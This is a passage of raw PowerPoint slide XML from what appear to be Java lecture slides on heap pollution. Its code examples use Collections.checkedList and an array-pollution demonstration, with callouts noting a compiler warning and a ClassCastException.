                  <a:schemeClr val="bg2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addToList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(List list, Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>list.add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  public static void main(String[] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>List&lt;String&gt; list = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ArrayList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;String&gt; ();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    List&lt;String&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>checkedList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Collections.checkedList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>String.class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addToList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>checkedList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 42);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>System.out.println</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>list.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(0))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangular Callout 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="2209801"/>
            <a:ext cx="2743200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -109151"/>
              <a:gd name="adj2" fmla="val -37692"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="292100" algn="l"/>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              </a:rPr>
              <a:t>Compiler emits</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              </a:rPr>
              <a:t> warning</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangular Callout 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="4343400"/>
            <a:ext cx="2743200" cy="419501"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -72210"/>
              <a:gd name="adj2" fmla="val 26718"/>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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="292100" algn="l"/>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ClassCastException</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5558601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350" y="228600"/>
            <a:ext cx="8474075" cy="713232"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Arrays</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="262784" y="1144428"/>
            <a:ext cx="8915400" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>public class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PolluteArrayExample</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>public static void main(String[] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>String list[] = {"foo", "bar"};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>modify(list);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000090"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>public static void modify(String[] list) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object[] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>objectArray</a:t>
            </a:r>
            <a:r>
